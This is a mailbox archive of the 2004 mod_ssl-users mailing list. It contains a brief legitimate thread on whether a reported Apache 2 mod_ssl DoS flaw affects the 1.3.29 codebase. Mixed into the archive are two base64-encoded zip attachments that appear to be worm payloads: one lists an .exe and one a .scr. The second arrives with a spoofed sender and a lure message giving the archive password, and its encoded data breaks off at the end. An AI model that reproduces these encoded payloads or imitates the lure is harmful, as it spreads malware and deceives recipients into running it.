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
ACZVAAAAAA==

----------ovggdcilgfyqipkjdjue--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 12 13:19:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BCF5AA897C; Fri, 12 Mar 2004 13:19:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 6F5B2A8973
	for ; Fri, 12 Mar 2004 13:19:06 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.10/8.12.10) with ESMTP id i2CCJ5BN002225
	for ; Fri, 12 Mar 2004 13:19:05 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i2CCJ49g005585
	for ; Fri, 12 Mar 2004 13:19:04 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: vulnerability in mod_ssl on apache 2
Date: Fri, 12 Mar 2004 13:19:04 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: vulnerability in mod_ssl on apache 2
Importance: normal
Thread-Index: AcQILDWz0LMSU2fgSuyfT37M35Hvtg==
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Greetings,

Does the DoS vulnerability reported in
http://secunia.com/advisories/11092/ affect the mod_ssl-2.8.16-1.3.29
codebase?

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 12 13:24:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B6CC6A897C; Fri, 12 Mar 2004 13:24:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 32A0CA898B
	for ; Fri, 12 Mar 2004 13:24:14 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i2CCOC07022239
	for ; Fri, 12 Mar 2004 07:24:12 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i2CCOC825594
	for ; Fri, 12 Mar 2004 07:24:12 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i2CCOBUr015845
	for ; Fri, 12 Mar 2004 12:24:11 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i2CCOBkq015844
	for modssl-users@modssl.org; Fri, 12 Mar 2004 12:24:11 GMT
Date: Fri, 12 Mar 2004 12:24:11 +0000
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: vulnerability in mod_ssl on apache 2
Message-ID: <20040312122411.GB15678@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Mar 12, 2004 at 01:19:04PM +0100, Boyle Owen wrote:
> Does the DoS vulnerability reported in
> http://secunia.com/advisories/11092/ affect the mod_ssl-2.8.16-1.3.29
> codebase?

No, it doesn't.

joe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 12 15:20:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3D212A8973; Fri, 12 Mar 2004 15:20:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id E7895A8938
	for ; Fri, 12 Mar 2004 15:20:39 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 0EC965E0274; Fri, 12 Mar 2004 15:20:43 +0100 (CET)
Date: Fri, 12 Mar 2004 15:20:43 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: vulnerability in mod_ssl on apache 2
Message-ID: <20040312142042.GA3177@gw>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Mar 12, 2004 at 01:19:04PM +0100, Boyle Owen wrote:
> Greetings,
> 
> Does the DoS vulnerability reported in
> http://secunia.com/advisories/11092/ affect the mod_ssl-2.8.16-1.3.29
> codebase?
> 
All the filtering stuff in mod_ssl was new in the Apache 2 version and didn't
turn up until after the code was imported.
http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_engine_io.c?r1=1.88&r2=1.89

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 13 11:39:02 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 41BBCA898B; Sat, 13 Mar 2004 11:39:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from TRITTON (host213-120-39-180.webport.bt.net [213.120.39.180])
	by master.modssl.org (Postfix) with SMTP id 84163A897A
	for ; Sat, 13 Mar 2004 11:38:51 +0100 (CET)
Date: Sat, 13 Mar 2004 10:41:41 +0000
To: modssl-users@modssl.org
Subject: ello! =))
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vqwewhqumtmqngsnhjyy"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vqwewhqumtmqngsnhjyy
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 The access is open !!!
 
archive password: 23076

----------vqwewhqumtmqngsnhjyy
Content-Type: application/octet-stream; name="Attach.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Attach.zip"

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
